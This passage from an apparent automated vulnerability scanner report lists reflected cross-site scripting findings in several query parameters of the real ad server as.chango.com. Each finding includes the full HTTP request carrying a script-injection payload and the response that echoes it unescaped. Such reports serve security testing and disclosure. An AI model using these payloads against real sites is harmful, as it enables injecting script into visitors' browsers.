GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e1b9c5"><script>alert(1)</script>48c2cd12581&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "c385102889332dc6718469e9914aa31a7a179a69"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2227
Date: Wed, 05 Oct 2011 21:34:25 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:25 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:25 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
99&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e1b9c5"><script>alert(1)</script>48c2cd12581&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e68250
...[SNIP]...

3.28. http://as.chango.com/links/adunit/1.31784957539e+12 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80b16"><script>alert(1)</script>783c5556847 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f49989080b16"><script>alert(1)</script>783c5556847 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "7e38d79cb93d4fe5dbe898a360116615053d75b1"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:27 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:27 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:27 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
e&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f49989080b16"><script>alert(1)</script>783c5556847&cu=&dsi=None&clickURL=">
...[SNIP]...

3.29. http://as.chango.com/links/adunit/1.31784957539e+12 [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6b5e"><script>alert(1)</script>2f9aa55d8cd was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broadc6b5e"><script>alert(1)</script>2f9aa55d8cd&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "2ea3068e5970042c7238e86b285d2553a7c4c30f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:25 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:25 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadc6b5e%22%3E%3Cscript%3Ealert%281%29%3C/script%3E2f9aa55d8cd; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:25 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broadc6b5e"><script>alert(1)</script>2f9aa55d8cd&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&click
...[SNIP]...

3.30. http://as.chango.com/links/adunit/1.31784957539e+12 [stid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1092"><script>alert(1)</script>8ac10f85f2b was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.comb1092"><script>alert(1)</script>8ac10f85f2b&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "4d9a96015b547482e426476fc6e5fcf31987ce3f"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:34:26 GMT
Content-Length: 2230
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.comb1092%22%3E%3Cscript%3Ealert%281%29%3C/script%3E8ac10f85f2b%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:26 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317850466064;click1=http://as.chango.com/links/click1317850466.07?acid=10699&adid=13713&agid=11720&stid=wattpad.comb1092"><script>alert(1)</script>8ac10f85f2b&url=http://www.wattpad.com/stories&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=b
...[SNIP]...

3.31. http://as.chango.com/links/adunit/1.31784957539e+12 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ea1"><script>alert(1)</script>cad35c4bc85 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstoriesa7ea1"><script>alert(1)</script>cad35c4bc85&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "54ef44e677231ebdf45652bd6ed6974023653d96"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:26 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:26 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317850466452;click1=http://as.chango.com/links/click1317850466.46?acid=10699&adid=13713&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/storiesa7ea1"><script>alert(1)</script>cad35c4bc85&dom=wattpad.com&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&k
...[SNIP]...

3.32. http://as.chango.com/links/adunit/1.31784957539e+12 [wh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcafe"><script>alert(1)</script>248a71ad420 was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300fcafe"><script>alert(1)</script>248a71ad420&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Content-Length: 466
Server: Chango RTB Server
ETag: "896695bff703bfd4bb3d4a6a0bcddc7a9052d6a4"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Date: Wed, 05 Oct 2011 21:34:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:26 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:26 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 300fcafe"><script>alert(1)</script>248a71ad420px; height: 250px; margin: 0; padding: 0;">
...[SNIP]...

3.33. http://as.chango.com/links/adunit/1.31784959608e+12 [adpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b19b"><script>alert(1)</script>002eeaa7af8 was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=02b19b"><script>alert(1)</script>002eeaa7af8&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "1f1590b559b0aa19fde3473344850ad1d7d05afe"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:15 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:15 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:15 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=02b19b"><script>alert(1)</script>002eeaa7af8&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&clickURL=">
...[SNIP]...

3.34. http://as.chango.com/links/adunit/1.31784959608e+12 [atype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 920c1"><script>alert(1)</script>b3a103ed94f was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC920c1"><script>alert(1)</script>b3a103ed94f&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "e6cfb98a4b391414141c6f2d2a30fc58f30166e3"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:16 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:16 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:16 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC920c1"><script>alert(1)</script>b3a103ed94f&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&clickURL=">
...[SNIP]...

3.35. http://as.chango.com/links/adunit/1.31784959608e+12 [bidder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fefb"><script>alert(1)</script>5a00be50b31 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west2fefb"><script>alert(1)</script>5a00be50b31&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
